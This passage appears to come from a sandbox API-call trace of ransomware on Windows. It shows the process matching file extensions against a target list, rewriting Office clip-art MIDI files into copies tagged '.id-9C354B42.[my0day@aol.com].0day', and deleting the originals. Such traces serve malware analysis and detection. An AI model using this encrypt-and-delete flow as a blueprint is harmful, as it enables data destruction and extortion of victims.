1 [0269.576] lstrlenW (lpString=".rar") returned 4 [0269.576] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.576] lstrlenW (lpString=".bz2") returned 4 [0269.576] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.576] lstrlenW (lpString=".7z") returned 3 [0269.576] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.577] lstrlenW (lpString=".dbf") returned 4 [0269.577] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.577] lstrlenW (lpString=".1cd") returned 4 [0269.577] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.577] lstrlenW (lpString=".jpg") returned 4 [0269.577] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.577] lstrlenW (lpString=".doc") returned 4 [0269.577] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.577] lstrlenW (lpString=".docx") returned 5 [0269.577] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.577] lstrlenW (lpString=".pdf") returned 4 [0269.577] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.577] lstrlenW (lpString=".xls") returned 4 [0269.577] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.577] lstrlenW (lpString=".xlsx") returned 5 [0269.577] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.577] lstrlenW (lpString=".ppt") returned 4 [0269.577] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.577] lstrlenW (lpString=".zip") returned 4 [0269.577] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.577] lstrlenW (lpString=".rar") returned 4 [0269.577] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.577] lstrlenW (lpString=".bz2") returned 4 [0269.577] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.577] lstrlenW (lpString=".7z") returned 3 [0269.577] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.577] lstrlenW (lpString=".dbf") returned 4 [0269.578] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.578] lstrlenW (lpString=".1cd") returned 4 [0269.578] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.578] lstrlenW (lpString=".jpg") returned 4 [0269.578] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.578] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0269.578] lstrlenW (lpString="EXPLR_01.MID") returned 12 [0269.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.578] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=10562) returned 1 [0269.578] CloseHandle (hObject=0x2c4) returned 1 [0269.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 0x20 [0269.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.607] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.607] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.651] GetLastError () returned 0x0 [0269.651] ReadFile (in: hFile=0x2cc, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x2942, lpOverlapped=0x0) returned 1 [0269.655] WriteFile (in: hFile=0x388, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x2950, lpOverlapped=0x0) returned 1 [0269.657] ReadFile (in: hFile=0x2cc, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.657] WriteFile (in: hFile=0x388, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.657] SetEndOfFile (hFile=0x388) returned 1 [0269.657] CloseHandle (hObject=0x388) returned 1 [0269.657] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.657] SetEndOfFile (hFile=0x2cc) returned 1 [0269.702] CloseHandle (hObject=0x2cc) returned 1 [0269.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 1 [0269.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.703] lstrlenW (lpString=".doc") returned 4 [0269.703] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.703] lstrlenW (lpString=".docx") returned 5 [0269.703] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.703] lstrlenW (lpString=".pdf") returned 4 [0269.703] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.703] lstrlenW (lpString=".xls") returned 4 [0269.703] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.703] lstrlenW (lpString=".xlsx") returned 5 [0269.703] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.703] lstrlenW (lpString=".ppt") returned 4 [0269.703] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.703] lstrlenW (lpString=".zip") returned 4 [0269.704] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.704] lstrlenW (lpString=".rar") returned 4 [0269.704] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.704] lstrlenW (lpString=".bz2") returned 4 [0269.704] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.704] lstrlenW (lpString=".7z") returned 3 [0269.704] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.704] lstrlenW (lpString=".dbf") returned 4 [0269.704] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.704] lstrlenW (lpString=".1cd") returned 4 [0269.704] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.704] lstrlenW (lpString=".jpg") returned 4 [0269.704] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.704] lstrlenW (lpString=".doc") returned 4 [0269.704] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.704] lstrlenW (lpString=".docx") returned 5 [0269.704] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.704] lstrlenW (lpString=".pdf") returned 4 [0269.704] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.704] lstrlenW (lpString=".xls") returned 4 [0269.704] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.704] lstrlenW (lpString=".xlsx") returned 5 [0269.704] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.705] lstrlenW (lpString=".ppt") returned 4 [0269.705] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.705] lstrlenW (lpString=".zip") returned 4 [0269.705] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.705] lstrlenW (lpString=".rar") returned 4 [0269.705] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.705] lstrlenW (lpString=".bz2") returned 4 [0269.705] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.705] lstrlenW (lpString=".7z") returned 3 [0269.705] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.705] lstrlenW (lpString=".dbf") returned 4 [0269.705] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.705] lstrlenW (lpString=".1cd") returned 4 [0269.705] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0269.705] lstrlenW (lpString=".jpg") returned 4 [0269.705] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.705] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0269.705] lstrlenW (lpString="FALL_01.MID") returned 11 [0269.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.761] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=4846) returned 1 [0269.761] CloseHandle (hObject=0x390) returned 1 [0269.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 0x20 [0269.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.762] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.762] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0269.764] GetLastError () returned 0x0 [0269.764] ReadFile (in: hFile=0x390, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x12ee, lpOverlapped=0x0) returned 1 [0269.766] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x12f0, lpOverlapped=0x0) returned 1 [0269.767] ReadFile (in: hFile=0x390, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.767] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0269.767] SetEndOfFile (hFile=0x394) returned 1 [0269.767] CloseHandle (hObject=0x394) returned 1 [0269.767] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.767] SetEndOfFile (hFile=0x390) returned 1 [0269.770] CloseHandle (hObject=0x390) returned 1 [0269.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.770] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 1 [0269.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.770] lstrlenW (lpString=".doc") returned 4 [0269.770] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.771] lstrlenW (lpString=".docx") returned 5 [0269.771] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.771] lstrlenW (lpString=".pdf") returned 4 [0269.771] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.771] lstrlenW (lpString=".xls") returned 4 [0269.771] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.771] lstrlenW (lpString=".xlsx") returned 5 [0269.771] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.771] lstrlenW (lpString=".ppt") returned 4 [0269.771] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.771] lstrlenW (lpString=".zip") returned 4 [0269.771] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.771] lstrlenW (lpString=".rar") returned 4 [0269.771] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.771] lstrlenW (lpString=".bz2") returned 4 [0269.771] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.771] lstrlenW (lpString=".7z") returned 3 [0269.771] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.771] lstrlenW (lpString=".dbf") returned 4 [0269.771] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.771] lstrlenW (lpString=".1cd") returned 4 [0269.771] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.771] lstrlenW (lpString=".jpg") returned 4 [0269.771] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.771] lstrlenW (lpString=".doc") returned 4 [0269.771] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.771] lstrlenW (lpString=".docx") returned 5 [0269.772] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.772] lstrlenW (lpString=".pdf") returned 4 [0269.772] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.772] lstrlenW (lpString=".xls") returned 4 [0269.772] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.772] lstrlenW (lpString=".xlsx") returned 5 [0269.772] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.772] lstrlenW (lpString=".ppt") returned 4 [0269.772] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.772] lstrlenW (lpString=".zip") returned 4 [0269.772] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.772] lstrlenW (lpString=".rar") returned 4 [0269.772] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.772] lstrlenW (lpString=".bz2") returned 4 [0269.772] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.772] lstrlenW (lpString=".7z") returned 3 [0269.772] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.772] lstrlenW (lpString=".dbf") returned 4 [0269.772] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.772] lstrlenW (lpString=".1cd") returned 4 [0269.772] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62 [0269.772] lstrlenW (lpString=".jpg") returned 4 [0269.772] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.772] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0269.772] lstrlenW (lpString="FINCL_01.MID") returned 12 [0269.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.774] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=12981) returned 1 [0269.774] CloseHandle (hObject=0x390) returned 1 [0269.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 0x20 [0269.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.774] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.774] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0269.775] GetLastError () returned 0x0 [0269.775] ReadFile (in: hFile=0x390, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x32b5, lpOverlapped=0x0) returned 1 [0269.777] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0269.778] ReadFile (in: hFile=0x390, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.778] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.778] SetEndOfFile (hFile=0x394) returned 1 [0269.778] CloseHandle (hObject=0x394) returned 1 [0269.778] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.778] SetEndOfFile (hFile=0x390) returned 1 [0270.062] CloseHandle (hObject=0x390) returned 1 [0270.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.443] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 1 [0270.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.443] lstrlenW (lpString=".doc") returned 4 [0270.443] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.443] lstrlenW (lpString=".docx") returned 5 [0270.443] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.443] lstrlenW (lpString=".pdf") returned 4 [0270.443] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.443] lstrlenW (lpString=".xls") returned 4 [0270.443] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.443] lstrlenW (lpString=".xlsx") returned 5 [0270.443] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.443] lstrlenW (lpString=".ppt") returned 4 [0270.443] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.443] lstrlenW (lpString=".zip") returned 4 [0270.443] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.443] lstrlenW (lpString=".rar") returned 4 [0270.444] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.444] lstrlenW (lpString=".bz2") returned 4 [0270.444] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.444] lstrlenW (lpString=".7z") returned 3 [0270.444] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.444] lstrlenW (lpString=".dbf") returned 4 [0270.444] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.444] lstrlenW (lpString=".1cd") returned 4 [0270.444] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0270.444] lstrlenW (lpString=".jpg") returned 4 